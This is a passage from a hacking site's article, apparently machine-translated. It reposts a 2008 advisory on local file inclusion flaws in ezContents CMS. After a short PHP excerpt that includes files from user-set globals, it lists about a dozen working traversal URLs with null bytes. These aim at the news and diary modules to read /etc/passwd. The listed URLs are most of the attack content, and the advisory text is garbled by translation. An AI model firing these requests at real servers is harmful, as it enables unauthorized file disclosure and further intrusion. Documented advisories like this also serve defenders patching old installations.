|
Hot Articles
Recommend Articles
New Articles
|
ezContents CMS many local documents contain the loophole(5)
Add date:
10/08/2008
Publishing date:
10/08/2008
Hits:
2
Total 6 pages, Current page:5, Jump to page:
|
global $EZ_SESSION_VARS;
$GLOBALS [“ModuleName”] = 'news';
$linkref = $nLink;
$chainlink = explode ('/', $linkref);
$modfilename = array_pop($chainlink);
$GLOBALS [“modfiledir”] = implode ('/', $chainlink);
include ($GLOBALS [“modfiledir”].”/moduleref.php ");
include_once ($GLOBALS [“language_home”]. $GLOBALS [“gsLanguage”].”/lang_admin.php ");
include_once ($GLOBALS [“language_home”]. $GLOBALS [“gsLanguage”].”/lang_main.php ");
#################################################
<* origin: Digital Security Research Group
Link: http://marc.info/?l=bugtraq&m=121968090815635&w=2
http://secunia.com/advisories/31606/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!
http:// [server]/[installdir]/modules/news/inlinenews.php? rootdp=DSecRG&nLink=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00/
http:// [server]/[installdir]/modules/news/inlinenews.php? rootdp=DSecRG&gsLanguage=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/news/inlinenews.php? rootdp=DSecRG&language_home=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/news/news_summary.php? rootdp=DSecRG&admin_home=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/submit_diary.php? rootdp=DSecRG&gsLanguage=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/submit_diary.php? rootdp=DSecRG&language_home=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/showdiarydetail.php? rootdp=DSecRG&admin_home=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/showdiarydetail.php? rootdp=DSecRG&gsLanguage=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/showdiarydetail.php? rootdp=DSecRG&language_home=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/showdiary.php? rootdp=DSecRG&gsLanguage=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/modules/diary/showdiary.php? rootdp=DSecRG&gsLanguage=DSecRG&language_home=. /. /. /. /. /. /. /. /. /. /. /. /. /etc/passwd%00
http:// [server]/[installdir]/module.php? link=….//….//….//….//….//….//….//….//….//….//….//….//….//etc/passwd
Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:
VisualShapers
-------------
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * Next>>
|
Comment:
 Category: Home
> System crack
|
|
You are here: hacking technology
> System crack
> Content